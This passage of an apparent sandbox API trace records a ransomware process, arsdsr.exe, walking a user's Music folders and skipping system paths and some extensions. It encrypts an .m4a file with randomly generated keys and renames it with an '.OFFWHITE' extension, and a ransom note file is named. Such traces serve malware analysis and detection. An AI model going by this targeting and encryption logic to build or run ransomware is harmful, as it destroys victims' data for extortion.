dwReserved1=0x295e370, cFileName="FJ-cAHzrAx.mp3", cAlternateFileName="FJ-CAH~1.MP3")) returned 1 [0134.868] lstrcmpiW (lpString1="FJ-cAHzrAx.mp3", lpString2=".") returned 1 [0134.869] lstrcmpiW (lpString1="FJ-cAHzrAx.mp3", lpString2="..") returned 1 [0134.869] lstrcmpiW (lpString1="FJ-cAHzrAx.mp3", lpString2="...") returned 1 [0134.869] lstrcmpiW (lpString1="FJ-cAHzrAx.mp3", lpString2="windows") returned -1 [0134.869] lstrcmpiW (lpString1="FJ-cAHzrAx.mp3", lpString2="$recycle.bin") returned 1 [0134.869] lstrcmpiW (lpString1="FJ-cAHzrAx.mp3", lpString2="rsa") returned -1 [0134.869] lstrcmpiW (lpString1="FJ-cAHzrAx.mp3", lpString2="ntuser.dat") returned -1 [0134.869] lstrcmpiW (lpString1="FJ-cAHzrAx.mp3", lpString2="programdata") returned -1 [0134.869] lstrcmpiW (lpString1="FJ-cAHzrAx.mp3", lpString2="appdata") returned 1 [0134.869] lstrcmpiW (lpString1="FJ-cAHzrAx.mp3", lpString2="program files") returned -1 [0134.869] lstrcmpiW (lpString1="FJ-cAHzrAx.mp3", lpString2="program files (x86)") returned -1 [0134.869] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\" [0134.869] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\", lpString2="FJ-cAHzrAx.mp3" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\FJ-cAHzrAx.mp3") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\FJ-cAHzrAx.mp3" [0134.869] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.869] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.869] PathFindExtensionW (pszPath="FJ-cAHzrAx.mp3") returned=".mp3" [0134.869] lstrcmpiW (lpString1=".mp3", lpString2=".exe") returned 1 [0134.869] lstrcmpiW (lpString1=".mp3", lpString2=".log") returned 1 [0134.869] lstrcmpiW (lpString1=".mp3", lpString2=".cab") returned 1 [0134.869] lstrcmpiW (lpString1=".mp3", lpString2=".cmd") returned 1 [0134.869] lstrcmpiW (lpString1=".mp3", lpString2=".com") returned 1 [0134.870] lstrcmpiW (lpString1=".mp3", lpString2=".cpl") returned 1 [0134.870] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0134.870] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0134.870] lstrcmpiW (lpString1=".mp3", lpString2=".url") returned -1 [0134.870] lstrcmpiW (lpString1=".mp3", lpString2=".ttf") returned -1 [0134.870] lstrcmpiW (lpString1=".mp3", lpString2=".mp3") returned 0 [0134.870] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ccafa70, ftCreationTime.dwHighDateTime=0x1d5dbd5, ftLastAccessTime.dwLowDateTime=0x21284f40, ftLastAccessTime.dwHighDateTime=0x1d5dd36, ftLastWriteTime.dwLowDateTime=0x21284f40, ftLastWriteTime.dwHighDateTime=0x1d5dd36, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c005a, dwReserved1=0x295e370, cFileName="HgxYFArFpEB94qIOgGhV", cAlternateFileName="HGXYFA~1")) returned 1 [0134.870] lstrcmpiW (lpString1="HgxYFArFpEB94qIOgGhV", lpString2=".") returned 1 [0134.870] lstrcmpiW (lpString1="HgxYFArFpEB94qIOgGhV", lpString2="..") returned 1 [0134.870] lstrcmpiW (lpString1="HgxYFArFpEB94qIOgGhV", lpString2="...") returned 1 [0134.870] lstrcmpiW (lpString1="HgxYFArFpEB94qIOgGhV", lpString2="windows") returned -1 [0134.870] lstrcmpiW (lpString1="HgxYFArFpEB94qIOgGhV", lpString2="$recycle.bin") returned 1 [0134.870] lstrcmpiW (lpString1="HgxYFArFpEB94qIOgGhV", lpString2="rsa") returned -1 [0134.870] lstrcmpiW (lpString1="HgxYFArFpEB94qIOgGhV", lpString2="ntuser.dat") returned -1 [0134.870] lstrcmpiW (lpString1="HgxYFArFpEB94qIOgGhV", lpString2="programdata") returned -1 [0134.870] lstrcmpiW (lpString1="HgxYFArFpEB94qIOgGhV", lpString2="appdata") returned 1 [0134.870] lstrcmpiW (lpString1="HgxYFArFpEB94qIOgGhV", lpString2="program files") returned -1 [0134.870] lstrcmpiW (lpString1="HgxYFArFpEB94qIOgGhV", lpString2="program files (x86)") returned -1 [0134.870] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\" [0134.870] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\", lpString2="HgxYFArFpEB94qIOgGhV" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV" [0134.870] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV", lpString2="\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\" [0134.870] lstrcpyW (in: lpString1=0x295d670, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\" [0134.870] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\", lpString2="*.*" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\*.*") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\*.*" [0134.870] FindFirstFileW (in: lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\*.*", lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ccafa70, ftCreationTime.dwHighDateTime=0x1d5dbd5, ftLastAccessTime.dwLowDateTime=0x21284f40, ftLastAccessTime.dwHighDateTime=0x1d5dd36, ftLastWriteTime.dwLowDateTime=0x21284f40, ftLastWriteTime.dwHighDateTime=0x1d5dd36, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295d1bc, dwReserved1=0x53c18046, cFileName=".", cAlternateFileName="")) returned 0x544750 [0134.872] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0134.872] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ccafa70, ftCreationTime.dwHighDateTime=0x1d5dbd5, ftLastAccessTime.dwLowDateTime=0x21284f40, ftLastAccessTime.dwHighDateTime=0x1d5dd36, ftLastWriteTime.dwLowDateTime=0x21284f40, ftLastWriteTime.dwHighDateTime=0x1d5dd36, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295d1bc, dwReserved1=0x53c18046, cFileName="..", cAlternateFileName="")) returned 1 [0134.872] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0134.873] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0134.873] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7389f550, ftCreationTime.dwHighDateTime=0x1d5dd9e, ftLastAccessTime.dwLowDateTime=0xdfb24e80, ftLastAccessTime.dwHighDateTime=0x1d5e122, ftLastWriteTime.dwLowDateTime=0xdfb24e80, ftLastWriteTime.dwHighDateTime=0x1d5e122, nFileSizeHigh=0x0, nFileSizeLow=0xea45, dwReserved0=0x295d1bc, dwReserved1=0x53c18046, cFileName="6IePv9oR3FdtHA2q.m4a", cAlternateFileName="6IEPV9~1.M4A")) returned 1 [0134.873] lstrcmpiW (lpString1="6IePv9oR3FdtHA2q.m4a", lpString2=".") returned 1 [0134.873] lstrcmpiW (lpString1="6IePv9oR3FdtHA2q.m4a", lpString2="..") returned 1 [0134.873] lstrcmpiW (lpString1="6IePv9oR3FdtHA2q.m4a", lpString2="...") returned 1 [0134.873] lstrcmpiW (lpString1="6IePv9oR3FdtHA2q.m4a", lpString2="windows") returned -1 [0134.873] lstrcmpiW (lpString1="6IePv9oR3FdtHA2q.m4a", lpString2="$recycle.bin") returned 1 [0134.873] lstrcmpiW (lpString1="6IePv9oR3FdtHA2q.m4a", lpString2="rsa") returned -1 [0134.873] lstrcmpiW (lpString1="6IePv9oR3FdtHA2q.m4a", lpString2="ntuser.dat") returned -1 [0134.873] lstrcmpiW (lpString1="6IePv9oR3FdtHA2q.m4a", lpString2="programdata") returned -1 [0134.873] lstrcmpiW (lpString1="6IePv9oR3FdtHA2q.m4a", lpString2="appdata") returned -1 [0134.873] lstrcmpiW (lpString1="6IePv9oR3FdtHA2q.m4a", lpString2="program files") returned -1 [0134.873] lstrcmpiW (lpString1="6IePv9oR3FdtHA2q.m4a", lpString2="program files (x86)") returned -1 [0134.873] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\" [0134.873] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\", lpString2="6IePv9oR3FdtHA2q.m4a" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\6IePv9oR3FdtHA2q.m4a") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\6IePv9oR3FdtHA2q.m4a" [0134.873] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.873] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.873] PathFindExtensionW (pszPath="6IePv9oR3FdtHA2q.m4a") returned=".m4a" [0134.873] lstrcmpiW (lpString1=".m4a", lpString2=".exe") returned 1 [0134.873] lstrcmpiW (lpString1=".m4a", lpString2=".log") returned 1 [0134.873] lstrcmpiW (lpString1=".m4a", lpString2=".cab") returned 1 [0134.873] lstrcmpiW (lpString1=".m4a", lpString2=".cmd") returned 1 [0134.873] lstrcmpiW (lpString1=".m4a", lpString2=".com") returned 1 [0134.873] lstrcmpiW (lpString1=".m4a", lpString2=".cpl") returned 1 [0134.873] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0134.873] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0134.873] lstrcmpiW (lpString1=".m4a", lpString2=".url") returned -1 [0134.874] lstrcmpiW (lpString1=".m4a", lpString2=".ttf") returned -1 [0134.874] lstrcmpiW (lpString1=".m4a", lpString2=".mp3") returned -1 [0134.874] lstrcmpiW (lpString1=".m4a", lpString2=".pif") returned -1 [0134.874] lstrcmpiW (lpString1=".m4a", lpString2=".mp4") returned -1 [0134.874] lstrcmpiW (lpString1=".m4a", lpString2=".OFFWHITE") returned -1 [0134.874] lstrcmpiW (lpString1=".m4a", lpString2=".msi") returned -1 [0134.874] lstrcmpiW (lpString1="6IePv9oR3FdtHA2q.m4a", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0134.874] GetProcessHeap () returned 0x500000 [0134.874] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x531800 [0134.874] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\6IePv9oR3FdtHA2q.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gcchq\\s1xiz\\hgxyfarfpeb94qiogghv\\6iepv9or3fdtha2q.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0134.874] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=59973) returned 1 [0134.874] GetProcessHeap () returned 0x500000 [0134.874] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0134.874] GetProcessHeap () returned 0x500000 [0134.874] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0134.874] GetProcessHeap () returned 0x500000 [0134.874] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0134.874] GetProcessHeap () returned 0x500000 [0134.875] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0134.875] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.875] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.875] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0134.875] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.875] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.875] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0134.875] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.875] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.875] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295cf90*=0x100) returned 1 [0134.875] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.875] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.875] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0134.876] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0xea45, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.876] SetLastError (dwErrCode=0x0) [0134.876] WriteFile (in: hFile=0x218, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0134.878] GetLastError () returned 0x0 [0134.878] GetLastError () returned 0x0 [0134.878] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0xeb45, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.878] WriteFile (in: hFile=0x218, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0134.878] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0xec45, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.878] WriteFile (in: hFile=0x218, lpBuffer=0x531800*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x531800*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0134.878] GetProcessHeap () returned 0x500000 [0134.878] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xea45) returned 0x55c7c8 [0134.879] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.879] ReadFile (in: hFile=0x218, lpBuffer=0x55c7c8, nNumberOfBytesToRead=0xea45, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x55c7c8*, lpNumberOfBytesRead=0x295d1c0*=0xea45, lpOverlapped=0x0) returned 1 [0134.883] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.883] WriteFile (in: hFile=0x218, lpBuffer=0x55c7c8*, nNumberOfBytesToWrite=0xea45, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55c7c8*, lpNumberOfBytesWritten=0x295d1cc*=0xea45, lpOverlapped=0x0) returned 1 [0134.884] GetProcessHeap () returned 0x500000 [0134.884] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55c7c8 | out: hHeap=0x500000) returned 1 [0134.884] CloseHandle (hObject=0x218) returned 1 [0134.886] GetProcessHeap () returned 0x500000 [0134.886] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0134.886] GetProcessHeap () returned 0x500000 [0134.886] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0134.886] GetProcessHeap () returned 0x500000 [0134.886] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0134.886] GetProcessHeap () returned 0x500000 [0134.886] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0134.886] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\6IePv9oR3FdtHA2q.m4a" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\6IePv9oR3FdtHA2q.m4a") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\6IePv9oR3FdtHA2q.m4a" [0134.886] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\6IePv9oR3FdtHA2q.m4a", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\6IePv9oR3FdtHA2q.m4a.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\6IePv9oR3FdtHA2q.m4a.OFFWHITE" [0134.886] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\6IePv9oR3FdtHA2q.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gcchq\\s1xiz\\hgxyfarfpeb94qiogghv\\6iepv9or3fdtha2q.m4a"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\6IePv9oR3FdtHA2q.m4a.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\gcchq\\s1xiz\\hgxyfarfpeb94qiogghv\\6iepv9or3fdtha2q.m4a.offwhite")) returned 1 [0134.887] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a6d64e0, ftCreationTime.dwHighDateTime=0x1d5d7c3, ftLastAccessTime.dwLowDateTime=0xf1091fc0, ftLastAccessTime.dwHighDateTime=0x1d5e1a8, ftLastWriteTime.dwLowDateTime=0xf1091fc0, ftLastWriteTime.dwHighDateTime=0x1d5e1a8, nFileSizeHigh=0x0, nFileSizeLow=0x359d, dwReserved0=0x295d1bc, dwReserved1=0x53c18046, cFileName="ChNP8yQ8ZV4sq.mp3", cAlternateFileName="CHNP8Y~1.MP3")) returned 1 [0134.887] lstrcmpiW (lpString1="ChNP8yQ8ZV4sq.mp3", lpString2=".") returned 1 [0134.887] lstrcmpiW (lpString1="ChNP8yQ8ZV4sq.mp3", lpString2="..") returned 1 [0134.887] lstrcmpiW (lpString1="ChNP8yQ8ZV4sq.mp3", lpString2="...") returned 1 [0134.887] lstrcmpiW (lpString1="ChNP8yQ8ZV4sq.mp3", lpString2="windows") returned -1 [0134.887] lstrcmpiW (lpString1="ChNP8yQ8ZV4sq.mp3", lpString2="$recycle.bin") returned 1 [0134.887] lstrcmpiW (lpString1="ChNP8yQ8ZV4sq.mp3", lpString2="rsa") returned -1 [0134.887] lstrcmpiW (lpString1="ChNP8yQ8ZV4sq.mp3", lpString2="ntuser.dat") returned -1 [0134.887] lstrcmpiW (lpString1="ChNP8yQ8ZV4sq.mp3", lpString2="programdata") returned -1 [0134.887] lstrcmpiW (lpString1="ChNP8yQ8ZV4sq.mp3", lpString2="appdata") returned 1 [0134.887] lstrcmpiW (lpString1="ChNP8yQ8ZV4sq.mp3", lpString2="program files") returned -1 [0134.887] lstrcmpiW (lpString1="ChNP8yQ8ZV4sq.mp3", lpString2="program files (x86)") returned -1 [0134.887] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\" [0134.887] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\", lpString2="ChNP8yQ8ZV4sq.mp3" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\ChNP8yQ8ZV4sq.mp3") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\ChNP8yQ8ZV4sq.mp3" [0134.887] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.888] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.888] PathFindExtensionW (pszPath="ChNP8yQ8ZV4sq.mp3") returned=".mp3" [0134.888] lstrcmpiW (lpString1=".mp3", lpString2=".exe") returned 1 [0134.888] lstrcmpiW (lpString1=".mp3", lpString2=".log") returned 1 [0134.888] lstrcmpiW (lpString1=".mp3", lpString2=".cab") returned 1 [0134.888] lstrcmpiW (lpString1=".mp3", lpString2=".cmd") returned 1 [0134.888] lstrcmpiW (lpString1=".mp3", lpString2=".com") returned 1 [0134.888] lstrcmpiW (lpString1=".mp3", lpString2=".cpl") returned 1 [0134.888] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0134.888] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0134.888] lstrcmpiW (lpString1=".mp3", lpString2=".url") returned -1 [0134.888] lstrcmpiW (lpString1=".mp3", lpString2=".ttf") returned -1 [0134.888] lstrcmpiW (lpString1=".mp3", lpString2=".mp3") returned 0 [0134.888] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2971ac0, ftCreationTime.dwHighDateTime=0x1d5dc96, ftLastAccessTime.dwLowDateTime=0x9d1fb780, ftLastAccessTime.dwHighDateTime=0x1d5dc7a, ftLastWriteTime.dwLowDateTime=0x9d1fb780, ftLastWriteTime.dwHighDateTime=0x1d5dc7a, nFileSizeHigh=0x0, nFileSizeLow=0xc2e4, dwReserved0=0x295d1bc, dwReserved1=0x53c18046, cFileName="fyqP50xC68MfFuZW.mp3", cAlternateFileName="FYQP50~1.MP3")) returned 1 [0134.888] lstrcmpiW (lpString1="fyqP50xC68MfFuZW.mp3", lpString2=".") returned 1 [0134.888] lstrcmpiW (lpString1="fyqP50xC68MfFuZW.mp3", lpString2="..") returned 1 [0134.888] lstrcmpiW (lpString1="fyqP50xC68MfFuZW.mp3", lpString2="...") returned 1 [0134.888] lstrcmpiW (lpString1="fyqP50xC68MfFuZW.mp3", lpString2="windows") returned -1 [0134.888] lstrcmpiW (lpString1="fyqP50xC68MfFuZW.mp3", lpString2="$recycle.bin") returned 1 [0134.888] lstrcmpiW (lpString1="fyqP50xC68MfFuZW.mp3", lpString2="rsa") returned -1 [0134.888] lstrcmpiW (lpString1="fyqP50xC68MfFuZW.mp3", lpString2="ntuser.dat") returned -1 [0134.888] lstrcmpiW (lpString1="fyqP50xC68MfFuZW.mp3", lpString2="programdata") returned -1 [0134.888] lstrcmpiW (lpString1="fyqP50xC68MfFuZW.mp3", lpString2="appdata") returned 1 [0134.888] lstrcmpiW (lpString1="fyqP50xC68MfFuZW.mp3", lpString2="program files") returned -1 [0134.888] lstrcmpiW (lpString1="fyqP50xC68MfFuZW.mp3", lpString2="program files (x86)") returned -1 [0134.888] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\" [0134.889] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\", lpString2="fyqP50xC68MfFuZW.mp3" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\fyqP50xC68MfFuZW.mp3") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Music\\GCchq\\S1XIz\\HgxYFArFpEB94qIOgGhV\\fyqP50xC68MfFuZW.mp3" [0134.889] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.889] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.889] PathFindExtensionW (pszPath="fyqP50xC68MfFuZW.mp3") returned=".mp3" [0134.889] lstrcmpiW (lpString1=".mp3", lpString2=".exe") returned 1 [0134.889] lstrcmpiW (lpString1=".mp3", lpString2=".log") returned 1 [0134.889] lstrcmpiW (lpString1=".mp3", lpString2=".cab") returned 1 [0134.889] lstrcmpiW (lpString1=".mp3", lpString2=".cmd") returned 1 [0134.889] lstrcmpiW (lpString1=".mp3", lpString2=".com") returned 1 [0134.889] lstrcmpiW (lpString1=".mp3", lpString2=".cpl") returned 1 [0134.889] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0134.889] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0134.889] lstrcmpiW 